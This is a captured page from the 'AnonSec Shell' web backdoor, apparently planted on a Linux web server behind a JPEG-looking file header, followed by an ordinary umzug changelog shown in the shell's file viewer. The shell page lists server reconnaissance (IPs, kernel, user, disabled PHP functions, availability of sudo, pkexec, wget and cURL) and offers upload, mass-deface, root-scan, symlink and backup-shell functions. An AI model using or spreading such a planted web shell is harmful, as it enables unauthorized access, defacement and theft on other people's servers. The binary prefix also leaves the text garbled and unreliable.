JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 172.67.142.142  /  Your IP : 104.23.243.117   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/comcon24/cms/node_modules/umzug/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/comcon24/cms/node_modules/umzug/CHANGELOG.md
# Change Log
All notable changes to this project will be documented in this file.

## v2.3.0 - 2020-03-22

### Added
- `migrationsList` helper to easily build a valid list of migrations
  [#199](https://github.com/sequelize/umzug/pull/199)
  
### Changed
- Documentation updates
  [#198](https://github.com/sequelize/umzug/pull/198)
- Updated dependencies
  [#203](https://github.com/sequelize/umzug/pull/203)
- Configure babel to not rely on babel-runtime
  [#202](https://github.com/sequelize/umzug/pull/202)
- Skip logging non-migration files
  [#190](https://github.com/sequelize/umzug/pull/190)

## v2.2.0 - 2018-11-18

### Added
- feat: support passing an array of Migrations
  [#164](https://github.com/sequelize/umzug/pull/164)
  
### Changed
- Doc fixes
  [#155](https://github.com/sequelize/umzug/pull/155)
- Add support for coffeescript 2
  [#157](https://github.com/sequelize/umzug/pull/157)
- throw error if a migration method doesn't return a thenable
  [#158](https://github.com/sequelize/umzug/pull/158)
- Update README.md with respect to MongoDBStorage
  [#165](https://github.com/sequelize/umzug/pull/165)
- fix multiple jsdoc lines related to MongoDBStorage
  [#174](https://github.com/sequelize/umzug/pull/174)
- clarify up/down migrations "to" option
  [#176](https://github.com/sequelize/umzug/pull/176)
- Test isolation by using different sqlite databases in each testsuite
  [#180](https://github.com/sequelize/umzug/pull/180)


## v2.1.0 - 2017-10-23
### Added
- Ability to traverse sub directories
  [#80](https://github.com/sequelize/umzug/pull/80)
  
## v2.0.0 - 2017-05-10
### Added
- Warn about ignored files in migrations directory
  [#108](https://github.com/sequelize/umzug/pull/108)
- Support ES6 default export in migrations
  [#132](https://github.com/sequelize/umzug/pull/132)
- Support custom storage instances
  [#133](https://github.com/sequelize/umzug/pull/133)

### Changed
- Use ES6 classes instead of redefine classes
  [#130](https://github.com/sequelize/umzug/pull/130)
- Pass only storage options to Storage constructor
  [#137](https://github.com/sequelize/umzug/pull/137)
  (Old format is still supported but **deprecated**.)

### Breaking changes
- Migration.migration(), Migration.up(), and Migration.down() returns Promise
  instead of Bluebird [#132](https://github.com/sequelize/umzug/pull/132)

### Deprecations
- Pass only storage options to Storage constructor
  [#137](https://github.com/sequelize/umzug/pull/137)

## v1.12.0 - 2017-04-21
### Added
- Option `timestamps` to Sequelize storage [#99](https://github.com/sequelize/umzug/pull/99)

### Fixed
- Reject migration if umzug can't find the migration method [#115](https://github.com/sequelize/umzug/pull/115)

## v1.11.0 - 2016-04-29
### Added
- Events `migrating`, `migrated`, `reverting`, and `reverted` #76
- Official support to all major Sequelize versions #73
- Official support to Node.js v0.12, io.js v1-v3, and Node.js v4-v5 #73

### Fixed
- Compatibility issues with Sequelize >= 3.15.1 #67

## v1.10.0 - 2016-04-17
### Added
- Option `from` to `up` and `down` methods #72

### Fixed
- Configurable `up` and `down` methods #70

## v1.9.1 - 2016-03-14
### Fixed
- Call of `down` with empty object

## v1.9.0 - 2016-02-09
### Changed
- Set charset for SequelizeMeta table to  `utf8`

## v1.8.1 - 2016-02-09
### Added
- Print details in error cases

### Changed
- The `options` input object is not modified anymore
- Updated lodash to 4.3.0

## v1.8.0 - 2016-01-05
### Added
- The `none` storage

## v1.7.2 - 2015-12-27
### Fixed
- Migrations on utf8mb4 databases

## v1.7.1 - 2015-12-03
### Changed
- Ensure existence of migration specified by `to` parameter

## v1.7.0 - 2015-11-21
### Added
- Option to define the database schema

### Changed
- Sort table entries when reading currently executed migrations

## 1.6.0
### Changed
- Don't resolve the sequelize library anymore but use the instance's constructor

## 1.5.0
### Added
- ActiveRecord like logging

## 1.4.0
### Added
- Builds for all versions of sequelize

### Changed
- Project is now compatible with all versions of sequelize

## 1.3.1
### Changed
- Update lodash to 3.0

## 1.3.0
### Added
- Possibility to define the column type of the sequelize meta table

Anon7 - 2022
AnonSec Team